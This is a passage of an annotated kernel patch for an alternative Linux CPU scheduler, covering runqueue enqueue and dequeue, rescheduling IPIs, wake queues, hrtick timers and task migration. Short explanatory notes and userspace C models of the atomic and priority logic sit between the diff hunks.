++#define __SCHED_ENQUEUE_TASK(p, rq, flags)				\
++	sched_info_enqueue(rq, p);					\
++	psi_enqueue(p, flags);						\
++									\
++	p->sq_idx = task_sched_prio_idx(p, rq);				\
++	list_add_tail(&p->sq_node, &rq->queue.heads[p->sq_idx]);	\
++	set_bit(sched_idx2prio(p->sq_idx, rq), rq->queue.bitmap);
++
++static inline void dequeue_task(struct task_struct *p, struct rq *rq, int flags)
++{
++	lockdep_assert_held(&rq->lock);
++
++	/*printk(KERN_INFO "sched: dequeue(%d) %px %016llx\n", cpu_of(rq), p, p->priodl);*/
++	WARN_ONCE(task_rq(p) != rq, "sched: dequeue task reside on cpu%d from cpu%d\n",
++		  task_cpu(p), cpu_of(rq));
++
++	__SCHED_DEQUEUE_TASK(p, rq, flags);
++	--rq->nr_running;
++#ifdef CONFIG_SMP
++	if (1 == rq->nr_running)
++		cpumask_clear_cpu(cpu_of(rq), &sched_rq_pending_mask);
++#endif
++
++	sched_update_tick_dependency(rq);
++}
++
++static inline void enqueue_task(struct task_struct *p, struct rq *rq, int flags)
++{
++	lockdep_assert_held(&rq->lock);
++
++	/*printk(KERN_INFO "sched: enqueue(%d) %px %016llx\n", cpu_of(rq), p, p->priodl);*/
++	WARN_ONCE(task_rq(p) != rq, "sched: enqueue task reside on cpu%d to cpu%d\n",
++		  task_cpu(p), cpu_of(rq));
++
++	__SCHED_ENQUEUE_TASK(p, rq, flags);
++	update_sched_rq_watermark(rq);
++	++rq->nr_running;
++#ifdef CONFIG_SMP
++	if (2 == rq->nr_running)
++		cpumask_set_cpu(cpu_of(rq), &sched_rq_pending_mask);
++#endif
++
++	sched_update_tick_dependency(rq);
++}
++
++static inline void requeue_task(struct task_struct *p, struct rq *rq, int idx)
++{
++	lockdep_assert_held(&rq->lock);
++	/*printk(KERN_INFO "sched: requeue(%d) %px %016llx\n", cpu_of(rq), p, p->priodl);*/
++	WARN_ONCE(task_rq(p) != rq, "sched: cpu[%d] requeue task reside on cpu%d\n",
++		  cpu_of(rq), task_cpu(p));
++
++	list_del(&p->sq_node);
++	list_add_tail(&p->sq_node, &rq->queue.heads[idx]);
++	if (idx != p->sq_idx) {
++		if (list_empty(&rq->queue.heads[p->sq_idx]))
++			clear_bit(sched_idx2prio(p->sq_idx, rq),
++				  rq->queue.bitmap);
++		p->sq_idx = idx;
++		set_bit(sched_idx2prio(p->sq_idx, rq), rq->queue.bitmap);
++		update_sched_rq_watermark(rq);
++	}
++}
++
++/*
++ * cmpxchg based fetch_or, macro so it works for different integer types
++ */
++#define fetch_or(ptr, mask)						\
++	({								\
++		typeof(ptr) _ptr = (ptr);				\
++		typeof(mask) _mask = (mask);				\
++		typeof(*_ptr) _val = *_ptr;				\
++									\
++		do {							\
++		} while (!try_cmpxchg(_ptr, &_val, _val | _mask));	\
++	_val;								\
++})
++
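
The macro above is a compare-and-swap loop: retry until the OR is
installed over the value last observed, then hand back that pre-OR value.
A userspace C11 model of the same semantics (try_cmpxchg(), like
compare_exchange_weak(), refreshes the expected value on failure):

#include <stdatomic.h>
#include <stdio.h>

static unsigned fetch_or(_Atomic unsigned *ptr, unsigned mask)
{
        unsigned val = atomic_load(ptr);

        /* Retry until the CAS installs val | mask over the val we saw. */
        while (!atomic_compare_exchange_weak(ptr, &val, val | mask))
                ;
        return val;
}

int main(void)
{
        _Atomic unsigned flags = 0x1;
        unsigned old = fetch_or(&flags, 0x4);

        printf("old=%#x new=%#x\n", old, atomic_load(&flags)); /* 0x1 0x5 */
        return 0;
}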
++#if defined(CONFIG_SMP) && defined(TIF_POLLING_NRFLAG)
++/*
++ * Atomically set TIF_NEED_RESCHED and test for TIF_POLLING_NRFLAG,
++ * this avoids any races wrt polling state changes and thereby avoids
++ * spurious IPIs.
++ */
++static inline bool set_nr_and_not_polling(struct task_struct *p)
++{
++	struct thread_info *ti = task_thread_info(p);
++	return !(fetch_or(&ti->flags, _TIF_NEED_RESCHED) & _TIF_POLLING_NRFLAG);
++}
++
++/*
++ * Atomically set TIF_NEED_RESCHED if TIF_POLLING_NRFLAG is set.
++ *
++ * If this returns true, then the idle task promises to call
++ * sched_ttwu_pending() and reschedule soon.
++ */
++static bool set_nr_if_polling(struct task_struct *p)
++{
++	struct thread_info *ti = task_thread_info(p);
++	typeof(ti->flags) val = READ_ONCE(ti->flags);
++
++	for (;;) {
++		if (!(val & _TIF_POLLING_NRFLAG))
++			return false;
++		if (val & _TIF_NEED_RESCHED)
++			return true;
++		if (try_cmpxchg(&ti->flags, &val, val | _TIF_NEED_RESCHED))
++			break;
++	}
++	return true;
++}
++
++#else
++static inline bool set_nr_and_not_polling(struct task_struct *p)
++{
++	set_tsk_need_resched(p);
++	return true;
++}
++
++#ifdef CONFIG_SMP
++static inline bool set_nr_if_polling(struct task_struct *p)
++{
++	return false;
++}
++#endif
++#endif
++
++static bool __wake_q_add(struct wake_q_head *head, struct task_struct *task)
++{
++	struct wake_q_node *node = &task->wake_q;
++
++	/*
++	 * Atomically grab the task, if ->wake_q is !nil already it means
++	 * it's already queued (either by us or someone else) and will get the
++	 * wakeup due to that.
++	 *
++	 * In order to ensure that a pending wakeup will observe our pending
++	 * state, even in the failed case, an explicit smp_mb() must be used.
++	 */
++	smp_mb__before_atomic();
++	if (unlikely(cmpxchg_relaxed(&node->next, NULL, WAKE_Q_TAIL)))
++		return false;
++
++	/*
++	 * The head is context local, there can be no concurrency.
++	 */
++	*head->lastp = node;
++	head->lastp = &node->next;
++	return true;
++}
++
++/**
++ * wake_q_add() - queue a wakeup for 'later' waking.
++ * @head: the wake_q_head to add @task to
++ * @task: the task to queue for 'later' wakeup
++ *
++ * Queue a task for later wakeup, most likely by the wake_up_q() call in the
++ * same context, _HOWEVER_ this is not guaranteed, the wakeup can come
++ * instantly.
++ *
++ * This function must be used as-if it were wake_up_process(); IOW the task
++ * must be ready to be woken at this location.
++ */
++void wake_q_add(struct wake_q_head *head, struct task_struct *task)
++{
++	if (__wake_q_add(head, task))
++		get_task_struct(task);
++}
++
++/**
++ * wake_q_add_safe() - safely queue a wakeup for 'later' waking.
++ * @head: the wake_q_head to add @task to
++ * @task: the task to queue for 'later' wakeup
++ *
++ * Queue a task for later wakeup, most likely by the wake_up_q() call in the
++ * same context, _HOWEVER_ this is not guaranteed, the wakeup can come
++ * instantly.
++ *
++ * This function must be used as-if it were wake_up_process(); IOW the task
++ * must be ready to be woken at this location.
++ *
++ * This function is essentially a task-safe equivalent to wake_q_add(). Callers
++ * that already hold reference to @task can call the 'safe' version and trust
++ * wake_q to do the right thing depending whether or not the @task is already
++ * queued for wakeup.
++ */
++void wake_q_add_safe(struct wake_q_head *head, struct task_struct *task)
++{
++	if (!__wake_q_add(head, task))
++		put_task_struct(task);
++}
++
++void wake_up_q(struct wake_q_head *head)
++{
++	struct wake_q_node *node = head->first;
++
++	while (node != WAKE_Q_TAIL) {
++		struct task_struct *task;
++
++		task = container_of(node, struct task_struct, wake_q);
++		/* task can safely be re-inserted now: */
++		node = node->next;
++		task->wake_q.next = NULL;
++
++		/*
++		 * wake_up_process() executes a full barrier, which pairs with
++		 * the queueing in wake_q_add() so as not to miss wakeups.
++		 */
++		wake_up_process(task);
++		put_task_struct(task);
++	}
++}
++
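
The usual pattern for this API is to collect wakeups while holding a lock
and issue them after the lock is dropped, which is exactly what
wake_up_q() enables. A kernel-style sketch (struct my_lock and
pick_next_waiter() are hypothetical stand-ins):

static void release_waiters(struct my_lock *lock)
{
        DEFINE_WAKE_Q(wake_q);
        struct task_struct *p;

        spin_lock(&lock->lock);
        while ((p = pick_next_waiter(lock)))
                wake_q_add(&wake_q, p);         /* takes a task reference */
        spin_unlock(&lock->lock);

        wake_up_q(&wake_q);                     /* wakeups + reference drops */
}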
++/*
++ * resched_curr - mark rq's current task 'to be rescheduled now'.
++ *
++ * On UP this means the setting of the need_resched flag, on SMP it
++ * might also involve a cross-CPU call to trigger the scheduler on
++ * the target CPU.
++ */
++void resched_curr(struct rq *rq)
++{
++	struct task_struct *curr = rq->curr;
++	int cpu;
++
++	lockdep_assert_held(&rq->lock);
++
++	if (test_tsk_need_resched(curr))
++		return;
++
++	cpu = cpu_of(rq);
++	if (cpu == smp_processor_id()) {
++		set_tsk_need_resched(curr);
++		set_preempt_need_resched();
++		return;
++	}
++
++	if (set_nr_and_not_polling(curr))
++		smp_send_reschedule(cpu);
++	else
++		trace_sched_wake_idle_without_ipi(cpu);
++}
++
++void resched_cpu(int cpu)
++{
++	struct rq *rq = cpu_rq(cpu);
++	unsigned long flags;
++
++	raw_spin_lock_irqsave(&rq->lock, flags);
++	if (cpu_online(cpu) || cpu == smp_processor_id())
++		resched_curr(cpu_rq(cpu));
++	raw_spin_unlock_irqrestore(&rq->lock, flags);
++}
++
++#ifdef CONFIG_SMP
++#ifdef CONFIG_NO_HZ_COMMON
++void nohz_balance_enter_idle(int cpu) {}
++
++void select_nohz_load_balancer(int stop_tick) {}
++
++void set_cpu_sd_state_idle(void) {}
++
++/*
++ * In the semi idle case, use the nearest busy CPU for migrating timers
++ * from an idle CPU.  This is good for power-savings.
++ *
++ * We don't do a similar optimization for a completely idle system, as
++ * selecting an idle CPU will add more delays to the timers than intended
++ * (as that CPU's timer base may not be up to date wrt jiffies etc).
++ */
++int get_nohz_timer_target(void)
++{
++	int i, cpu = smp_processor_id(), default_cpu = -1;
++	struct cpumask *mask;
++	const struct cpumask *hk_mask;
++
++	if (housekeeping_cpu(cpu, HK_TYPE_TIMER)) {
++		if (!idle_cpu(cpu))
++			return cpu;
++		default_cpu = cpu;
++	}
++
++	hk_mask = housekeeping_cpumask(HK_TYPE_TIMER);
++
++	for (mask = per_cpu(sched_cpu_topo_masks, cpu) + 1;
++	     mask < per_cpu(sched_cpu_topo_end_mask, cpu); mask++)
++		for_each_cpu_and(i, mask, hk_mask)
++			if (!idle_cpu(i))
++				return i;
++
++	if (default_cpu == -1)
++		default_cpu = housekeeping_any_cpu(HK_TYPE_TIMER);
++	cpu = default_cpu;
++
++	return cpu;
++}
++
++/*
++ * When add_timer_on() enqueues a timer into the timer wheel of an
++ * idle CPU then this timer might expire before the next timer event
++ * which is scheduled to wake up that CPU. In case of a completely
++ * idle system the next event might even be infinite time into the
++ * future. wake_up_idle_cpu() ensures that the CPU is woken up and
++ * leaves the inner idle loop so the newly added timer is taken into
++ * account when the CPU goes back to idle and evaluates the timer
++ * wheel for the next timer event.
++ */
++static inline void wake_up_idle_cpu(int cpu)
++{
++	struct rq *rq = cpu_rq(cpu);
++
++	if (cpu == smp_processor_id())
++		return;
++
++	if (set_nr_and_not_polling(rq->idle))
++		smp_send_reschedule(cpu);
++	else
++		trace_sched_wake_idle_without_ipi(cpu);
++}
++
++static inline bool wake_up_full_nohz_cpu(int cpu)
++{
++	/*
++	 * We just need the target to call irq_exit() and re-evaluate
++	 * the next tick. The nohz full kick at least implies that.
++	 * If needed we can still optimize that later with an
++	 * empty IRQ.
++	 */
++	if (cpu_is_offline(cpu))
++		return true;  /* Don't try to wake offline CPUs. */
++	if (tick_nohz_full_cpu(cpu)) {
++		if (cpu != smp_processor_id() ||
++		    tick_nohz_tick_stopped())
++			tick_nohz_full_kick_cpu(cpu);
++		return true;
++	}
++
++	return false;
++}
++
++void wake_up_nohz_cpu(int cpu)
++{
++	if (!wake_up_full_nohz_cpu(cpu))
++		wake_up_idle_cpu(cpu);
++}
++
++static void nohz_csd_func(void *info)
++{
++	struct rq *rq = info;
++	int cpu = cpu_of(rq);
++	unsigned int flags;
++
++	/*
++	 * Release the rq::nohz_csd.
++	 */
++	flags = atomic_fetch_andnot(NOHZ_KICK_MASK, nohz_flags(cpu));
++	WARN_ON(!(flags & NOHZ_KICK_MASK));
++
++	rq->idle_balance = idle_cpu(cpu);
++	if (rq->idle_balance && !need_resched()) {
++		rq->nohz_idle_balance = flags;
++		raise_softirq_irqoff(SCHED_SOFTIRQ);
++	}
++}
++
++#endif /* CONFIG_NO_HZ_COMMON */
++#endif /* CONFIG_SMP */
++
++static inline void check_preempt_curr(struct rq *rq)
++{
++	if (sched_rq_first_task(rq) != rq->curr)
++		resched_curr(rq);
++}
++
++#ifdef CONFIG_SCHED_HRTICK
++/*
++ * Use HR-timers to deliver accurate preemption points.
++ */
++
++static void hrtick_clear(struct rq *rq)
++{
++	if (hrtimer_active(&rq->hrtick_timer))
++		hrtimer_cancel(&rq->hrtick_timer);
++}
++
++/*
++ * High-resolution timer tick.
++ * Runs from hardirq context with interrupts disabled.
++ */
++static enum hrtimer_restart hrtick(struct hrtimer *timer)
++{
++	struct rq *rq = container_of(timer, struct rq, hrtick_timer);
++
++	WARN_ON_ONCE(cpu_of(rq) != smp_processor_id());
++
++	raw_spin_lock(&rq->lock);
++	resched_curr(rq);
++	raw_spin_unlock(&rq->lock);
++
++	return HRTIMER_NORESTART;
++}
++
++/*
++ * Use hrtick when:
++ *  - enabled by features
++ *  - hrtimer is actually high res
++ */
++static inline int hrtick_enabled(struct rq *rq)
++{
++	/*
++	 * The alt scheduler doesn't support sched_feat() yet:
++	if (!sched_feat(HRTICK))
++		return 0;
++	*/
++	if (!cpu_active(cpu_of(rq)))
++		return 0;
++	return hrtimer_is_hres_active(&rq->hrtick_timer);
++}
++
++#ifdef CONFIG_SMP
++
++static void __hrtick_restart(struct rq *rq)
++{
++	struct hrtimer *timer = &rq->hrtick_timer;
++	ktime_t time = rq->hrtick_time;
++
++	hrtimer_start(timer, time, HRTIMER_MODE_ABS_PINNED_HARD);
++}
++
++/*
++ * called from hardirq (IPI) context
++ */
++static void __hrtick_start(void *arg)
++{
++	struct rq *rq = arg;
++
++	raw_spin_lock(&rq->lock);
++	__hrtick_restart(rq);
++	raw_spin_unlock(&rq->lock);
++}
++
++/*
++ * Called to set the hrtick timer state.
++ *
++ * called with rq->lock held and irqs disabled
++ */
++void hrtick_start(struct rq *rq, u64 delay)
++{
++	struct hrtimer *timer = &rq->hrtick_timer;
++	s64 delta;
++
++	/*
++	 * Don't schedule slices shorter than 10000ns, that just
++	 * doesn't make sense and can cause timer DoS.
++	 */
++	delta = max_t(s64, delay, 10000LL);
++
++	rq->hrtick_time = ktime_add_ns(timer->base->get_time(), delta);
++
++	if (rq == this_rq())
++		__hrtick_restart(rq);
++	else
++		smp_call_function_single_async(cpu_of(rq), &rq->hrtick_csd);
++}
++
++#else
++/*
++ * Called to set the hrtick timer state.
++ *
++ * called with rq->lock held and irqs disabled
++ */
++void hrtick_start(struct rq *rq, u64 delay)
++{
++	/*
++	 * Don't schedule slices shorter than 10000ns, that just
++	 * doesn't make sense. Rely on vruntime for fairness.
++	 */
++	delay = max_t(u64, delay, 10000LL);
++	hrtimer_start(&rq->hrtick_timer, ns_to_ktime(delay),
++		      HRTIMER_MODE_REL_PINNED_HARD);
++}
++#endif /* CONFIG_SMP */
++
++static void hrtick_rq_init(struct rq *rq)
++{
++#ifdef CONFIG_SMP
++	INIT_CSD(&rq->hrtick_csd, __hrtick_start, rq);
++#endif
++
++	hrtimer_init(&rq->hrtick_timer, CLOCK_MONOTONIC, HRTIMER_MODE_REL_HARD);
++	rq->hrtick_timer.function = hrtick;
++}
++#else	/* CONFIG_SCHED_HRTICK */
++static inline int hrtick_enabled(struct rq *rq)
++{
++	return 0;
++}
++
++static inline void hrtick_clear(struct rq *rq)
++{
++}
++
++static inline void hrtick_rq_init(struct rq *rq)
++{
++}
++#endif	/* CONFIG_SCHED_HRTICK */
++
++static inline int __normal_prio(int policy, int rt_prio, int static_prio)
++{
++	return rt_policy(policy) ? (MAX_RT_PRIO - 1 - rt_prio) :
++		static_prio + MAX_PRIORITY_ADJ;
++}
++
++/*
++ * Calculate the expected normal priority: i.e. priority
++ * without taking RT-inheritance into account. Might be
++ * boosted by interactivity modifiers. Changes upon fork,
++ * setprio syscalls, and whenever the interactivity
++ * estimator recalculates.
++ */
++static inline int normal_prio(struct task_struct *p)
++{
++	return __normal_prio(p->policy, p->rt_priority, p->static_prio);
++}
++
++/*
++ * Calculate the current priority, i.e. the priority
++ * taken into account by the scheduler. This value might
++ * be boosted by RT tasks as it will be RT if the task got
++ * RT-boosted. If not then it returns p->normal_prio.
++ */
++static int effective_prio(struct task_struct *p)
++{
++	p->normal_prio = normal_prio(p);
++	/*
++	 * If we are RT tasks or we were boosted to RT priority,
++	 * keep the priority unchanged. Otherwise, update priority
++	 * to the normal priority:
++	 */
++	if (!rt_prio(p->prio))
++		return p->normal_prio;
++	return p->prio;
++}
++
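
Under BMQ, a nice-0 SCHED_NORMAL task has static_prio 120, so
__normal_prio() above yields 127 (120 + MAX_PRIORITY_ADJ), while a
SCHED_FIFO task with rt_priority 50 maps to 49. A quick userspace check
of that arithmetic:

#include <assert.h>
#include <stdbool.h>

#define MAX_RT_PRIO      100
#define MAX_PRIORITY_ADJ 7

static int normal_prio_model(bool rt, int rt_prio, int static_prio)
{
        return rt ? (MAX_RT_PRIO - 1 - rt_prio)
                  : static_prio + MAX_PRIORITY_ADJ;
}

int main(void)
{
        assert(normal_prio_model(false, 0, 120) == 127); /* nice 0, SCHED_NORMAL */
        assert(normal_prio_model(true, 50, 0) == 49);    /* SCHED_FIFO, rt_prio 50 */
        return 0;
}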
++/*
++ * activate_task - move a task to the runqueue.
++ *
++ * Context: rq->lock
++ */
++static void activate_task(struct task_struct *p, struct rq *rq)
++{
++	enqueue_task(p, rq, ENQUEUE_WAKEUP);
++	p->on_rq = TASK_ON_RQ_QUEUED;
++
++	/*
++	 * If in_iowait is set, the code below may not trigger any cpufreq
++	 * utilization updates, so do it here explicitly with the IOWAIT flag
++	 * passed.
++	 */
++	cpufreq_update_util(rq, SCHED_CPUFREQ_IOWAIT * p->in_iowait);
++}
++
++/*
++ * deactivate_task - remove a task from the runqueue.
++ *
++ * Context: rq->lock
++ */
++static inline void deactivate_task(struct task_struct *p, struct rq *rq)
++{
++	dequeue_task(p, rq, DEQUEUE_SLEEP);
++	p->on_rq = 0;
++	cpufreq_update_util(rq, 0);
++}
++
++static inline void __set_task_cpu(struct task_struct *p, unsigned int cpu)
++{
++#ifdef CONFIG_SMP
++	/*
++	 * After ->cpu is set up to a new value, task_access_lock(p, ...) can be
++	 * successfully executed on another CPU. We must ensure that updates of
++	 * per-task data have been completed by this moment.
++	 */
++	smp_wmb();
++
++	WRITE_ONCE(task_thread_info(p)->cpu, cpu);
++#endif
++}
++
++static inline bool is_migration_disabled(struct task_struct *p)
++{
++#ifdef CONFIG_SMP
++	return p->migration_disabled;
++#else
++	return false;
++#endif
++}
++
++#define SCA_CHECK		0x01
++#define SCA_USER		0x08
++
++#ifdef CONFIG_SMP
++
++void set_task_cpu(struct task_struct *p, unsigned int new_cpu)
++{
++#ifdef CONFIG_SCHED_DEBUG
++	unsigned int state = READ_ONCE(p->__state);
++
++	/*
++	 * We should never call set_task_cpu() on a blocked task,
++	 * ttwu() will sort out the placement.
++	 */
++	WARN_ON_ONCE(state != TASK_RUNNING && state != TASK_WAKING && !p->on_rq);
++
++#ifdef CONFIG_LOCKDEP
++	/*
++	 * The caller should hold either p->pi_lock or rq->lock, when changing
++	 * a task's CPU. ->pi_lock for waking tasks, rq->lock for runnable tasks.
++	 *
++	 * sched_move_task() holds both and thus holding either pins the cgroup,
++	 * see task_group().
++	 */
++	WARN_ON_ONCE(debug_locks && !(lockdep_is_held(&p->pi_lock) ||
++				      lockdep_is_held(&task_rq(p)->lock)));
++#endif
++	/*
++	 * Clearly, migrating tasks to offline CPUs is a fairly daft thing.
++	 */
++	WARN_ON_ONCE(!cpu_online(new_cpu));
++
++	WARN_ON_ONCE(is_migration_disabled(p));
++#endif
++	if (task_cpu(p) == new_cpu)
++		return;
++	trace_sched_migrate_task(p, new_cpu);
++	rseq_migrate(p);
++	perf_event_task_migrate(p);
++
++	__set_task_cpu(p, new_cpu);
++}
++
++#define MDF_FORCE_ENABLED	0x80
++
++static void
++__do_set_cpus_ptr(struct task_struct *p, const struct cpumask *new_mask)
++{
++	/*
++	 * This here violates the locking rules for affinity, since we're only
++	 * supposed to change these variables while holding both rq->lock and
++	 * p->pi_lock.
++	 *
++	 * HOWEVER, it magically works, because ttwu() is the only code that
++	 * accesses these variables under p->pi_lock and only does so after
++	 * smp_cond_load_acquire(&p->on_cpu, !VAL), and we're in __schedule()
++	 * before finish_task().
++	 *
++	 * XXX do further audits, this smells like something putrid.
++	 */
++	SCHED_WARN_ON(!p->on_cpu);
++	p->cpus_ptr = new_mask;
++}
++
++void migrate_disable(void)
++{
++	struct task_struct *p = current;
++	int cpu;
++
++	if (p->migration_disabled) {
++		p->migration_disabled++;
++		return;
++	}
++
++	preempt_disable();
++	cpu = smp_processor_id();
++	if (cpumask_test_cpu(cpu, &p->cpus_mask)) {
++		cpu_rq(cpu)->nr_pinned++;
++		p->migration_disabled = 1;
++		p->migration_flags &= ~MDF_FORCE_ENABLED;
++
++		/*
++		 * Violates locking rules! see comment in __do_set_cpus_ptr().
++		 */
++		if (p->cpus_ptr == &p->cpus_mask)
++			__do_set_cpus_ptr(p, cpumask_of(cpu));
++	}
++	preempt_enable();
++}
++EXPORT_SYMBOL_GPL(migrate_disable);
++
++void migrate_enable(void)
++{
++	struct task_struct *p = current;
++
++	if (0 == p->migration_disabled)
++		return;
++
++	if (p->migration_disabled > 1) {
++		p->migration_disabled--;
++		return;
++	}
++
++	if (WARN_ON_ONCE(!p->migration_disabled))
++		return;
++
++	/*
++	 * Ensure stop_task runs either before or after this, and that
++	 * __set_cpus_allowed_ptr(SCA_MIGRATE_ENABLE) doesn't schedule().
++	 */
++	preempt_disable();
++	/*
++	 * Assumption: current should be running on allowed cpu
++	 */
++	WARN_ON_ONCE(!cpumask_test_cpu(smp_processor_id(), &p->cpus_mask));
++	if (p->cpus_ptr != &p->cpus_mask)
++		__do_set_cpus_ptr(p, &p->cpus_mask);
++	/*
++	 * Mustn't clear migration_disabled() until cpus_ptr points back at the
++	 * regular cpus_mask, otherwise things that race (eg.
++	 * select_fallback_rq) get confused.
++	 */
++	barrier();
++	p->migration_disabled = 0;
++	this_rq()->nr_pinned--;
++	preempt_enable();
++}
++EXPORT_SYMBOL_GPL(migrate_enable);
++
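
A typical (kernel-style, illustrative) use of the pair above pins the
current task to its CPU across a section that tolerates preemption but
must not migrate:

migrate_disable();
/* ... touch per-CPU state that must not move to another CPU ... */
migrate_enable();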
++static inline bool rq_has_pinned_tasks(struct rq *rq)
++{
++	return rq->nr_pinned;
++}
++
++/*
++ * Per-CPU kthreads are allowed to run on !active && online CPUs, see
++ * __set_cpus_allowed_ptr() and select_fallback_rq().
++ */
++static inline bool is_cpu_allowed(struct task_struct *p, int cpu)
++{
++	/* When not in the task's cpumask, no point in looking further. */
++	if (!cpumask_test_cpu(cpu, p->cpus_ptr))
++		return false;
++
++	/* migrate_disabled() must be allowed to finish. */
++	if (is_migration_disabled(p))
++		return cpu_online(cpu);
++
++	/* Non kernel threads are not allowed during either online or offline. */
++	if (!(p->flags & PF_KTHREAD))
++		return cpu_active(cpu) && task_cpu_possible(cpu, p);
++
++	/* KTHREAD_IS_PER_CPU is always allowed. */
++	if (kthread_is_per_cpu(p))
++		return cpu_online(cpu);
++
++	/* Regular kernel threads don't get to stay during offline. */
++	if (cpu_dying(cpu))
++		return false;
++
++	/* But are allowed during online. */
++	return cpu_online(cpu);
++}
++
++/*
++ * This is how migration works:
++ *
++ * 1) we invoke migration_cpu_stop() on the target CPU using
++ *    stop_one_cpu().
++ * 2) stopper starts to run (implicitly forcing the migrated thread
++ *    off the CPU)
++ * 3) it checks whether the migrated task is still in the wrong runqueue.
++ * 4) if it's in the wrong runqueue then the migration thread removes
++ *    it and puts it into the right queue.
++ * 5) stopper completes and stop_one_cpu() returns and the migration
++ *    is done.
++ */
++
++/*
++ * move_queued_task - move a queued task to new rq.
++ *
++ * Returns (locked) new rq. Old rq's lock is released.
++ */
++static struct rq *move_queued_task(struct rq *rq, struct task_struct *p, int
++				   new_cpu)
++{
++	lockdep_assert_held(&rq->lock);
++
++	WRITE_ONCE(p->on_rq, TASK_ON_RQ_MIGRATING);
++	dequeue_task(p, rq, 0);
++	update_sched_rq_watermark(rq);
++	set_task_cpu(p, new_cpu);
++	raw_spin_unlock(&rq->lock);
++
++	rq = cpu_rq(new_cpu);
++
++	raw_spin_lock(&rq->lock);
++	WARN_ON_ONCE(task_cpu(p) != new_cpu);
++	sched_task_sanity_check(p, rq);
++	enqueue_task(p, rq, 0);
++	p->on_rq = TASK_ON_RQ_QUEUED;
++	check_preempt_curr(rq);
++
++	return rq;
++}
++
++struct migration_arg {
++	struct task_struct *task;
++	int dest_cpu;
++};
++
++/*
++ * Move (not current) task off this CPU, onto the destination CPU. We're doing
++ * this because either it can't run here any more (set_cpus_allowed()
++ * away from this CPU, or CPU going down), or because we're
++ * attempting to rebalance this task on exec (sched_exec).
++ *
++ * So we race with normal scheduler movements, but that's OK, as long
++ * as the task is no longer on this CPU.
++ */
++static struct rq *__migrate_task(struct rq *rq, struct task_struct *p, int
++				 dest_cpu)
++{
++	/* Affinity changed (again). */
++	if (!is_cpu_allowed(p, dest_cpu))
++		return rq;
++
++	update_rq_clock(rq);
++	return move_queued_task(rq, p, dest_cpu);
++}
++
++/*
++ * migration_cpu_stop - this will be executed by a highprio stopper thread
++ * and performs thread migration by bumping thread off CPU then
++ * 'pushing' onto another runqueue.
++ */
++static int migration_cpu_stop(void *data)
++{
++	struct migration_arg *arg = data;
++	struct task_struct *p = arg->task;
++	struct rq *rq = this_rq();
++	unsigned long flags;
++
++	/*
++	 * The original target CPU might have gone down and we might
++	 * be on another CPU but it doesn't matter.
++	 */
++	local_irq_save(flags);
++	/*
++	 * We need to explicitly wake pending tasks before running
++	 * __migrate_task() such that we will not miss enforcing cpus_ptr
++	 * during wakeups, see set_cpus_allowed_ptr()'s TASK_WAKING test.
++	 */
++	flush_smp_call_function_queue();
++
++	raw_spin_lock(&p->pi_lock);
++	raw_spin_lock(&rq->lock);
++	/*
++	 * If task_rq(p) != rq, it cannot be migrated here, because we're
++	 * holding rq->lock, if p->on_rq == 0 it cannot get enqueued because
++	 * we're holding p->pi_lock.
++	 */
++	if (task_rq(p) == rq && task_on_rq_queued(p))
++		rq = __migrate_task(rq, p, arg->dest_cpu);
++	raw_spin_unlock(&rq->lock);
++	raw_spin_unlock_irqrestore(&p->pi_lock, flags);
++
++	return 0;
++}
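++
++/*
++ * Illustrative sketch of the five-step sequence described above (a
++ * hypothetical, compiled-out helper for exposition only; real callers
++ * such as affine_move_task() drop p->pi_lock and rq->lock before
++ * calling stop_one_cpu()):
++ */
++#if 0
++static void example_force_migration(struct task_struct *p, int dest_cpu)
++{
++	struct migration_arg arg = { .task = p, .dest_cpu = dest_cpu };
++
++	/* Steps 1-2: run migration_cpu_stop() on the task's current CPU. */
++	stop_one_cpu(task_cpu(p), migration_cpu_stop, &arg);
++	/* Steps 3-5: the stopper re-checks and requeues @p, then returns. */
++}
++#endif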
++
++static inline void
++set_cpus_allowed_common(struct task_struct *p, const struct cpumask *new_mask)
++{
++	cpumask_copy(&p->cpus_mask, new_mask);
++	p->nr_cpus_allowed = cpumask_weight(new_mask);
++}
++
++static void
++__do_set_cpus_allowed(struct task_struct *p, const struct cpumask *new_mask)
++{
++	lockdep_assert_held(&p->pi_lock);
++	set_cpus_allowed_common(p, new_mask);
++}
++
++void do_set_cpus_allowed(struct task_struct *p, const struct cpumask *new_mask)
++{
++	__do_set_cpus_allowed(p, new_mask);
++}
++
++int dup_user_cpus_ptr(struct task_struct *dst, struct task_struct *src,
++		      int node)
++{
++	if (!src->user_cpus_ptr)
++		return 0;
++
++	dst->user_cpus_ptr = kmalloc_node(cpumask_size(), GFP_KERNEL, node);
++	if (!dst->user_cpus_ptr)
++		return -ENOMEM;
++
++	cpumask_copy(dst->user_cpus_ptr, src->user_cpus_ptr);
++	return 0;
++}
++
++static inline struct cpumask *clear_user_cpus_ptr(struct task_struct *p)
++{
++	struct cpumask *user_mask = NULL;
++
++	swap(p->user_cpus_ptr, user_mask);
++
++	return user_mask;
++}
++
++void release_user_cpus_ptr(struct task_struct *p)
++{
++	kfree(clear_user_cpus_ptr(p));
++}
++
++#endif
++
++/**
++ * task_curr - is this task currently executing on a CPU?
++ * @p: the task in question.
++ *
++ * Return: 1 if the task is currently executing. 0 otherwise.
++ */
++inline int task_curr(const struct task_struct *p)
++{
++	return cpu_curr(task_cpu(p)) == p;
++}
++
++#ifdef CONFIG_SMP
++/*
++ * wait_task_inactive - wait for a thread to unschedule.
++ *
++ * Wait for the thread to block in any of the states set in @match_state.
++ * If it changes, i.e. @p might have woken up, then return zero.  When we
++ * succeed in waiting for @p to be off its CPU, we return a positive number
++ * (its total switch count).  If a second call a short while later returns the
++ * same number, the caller can be sure that @p has remained unscheduled the
++ * whole time.
++ *
++ * The caller must ensure that the task *will* unschedule sometime soon,
++ * else this function might spin for a *long* time. This function can't
++ * be called with interrupts off, or it may introduce deadlock with
++ * smp_call_function() if an IPI is sent by the same process we are
++ * waiting to become inactive.
++ */
++unsigned long wait_task_inactive(struct task_struct *p, unsigned int match_state)
++{
++	unsigned long flags;
++	bool running, on_rq;
++	unsigned long ncsw;
++	struct rq *rq;
++	raw_spinlock_t *lock;
++
++	for (;;) {
++		rq = task_rq(p);
++
++		/*
++		 * If the task is actively running on another CPU
++		 * still, just relax and busy-wait without holding
++		 * any locks.
++		 *
++		 * NOTE! Since we don't hold any locks, it's not
++		 * even guaranteed that "rq" stays the right runqueue!
++		 * But we don't care, since this will return false
++		 * if the runqueue has changed and p is actually now
++		 * running somewhere else!
++		 */
++		while (task_on_cpu(p) && p == rq->curr) {
++			if (!(READ_ONCE(p->__state) & match_state))
++				return 0;
++			cpu_relax();
++		}
++
++		/*
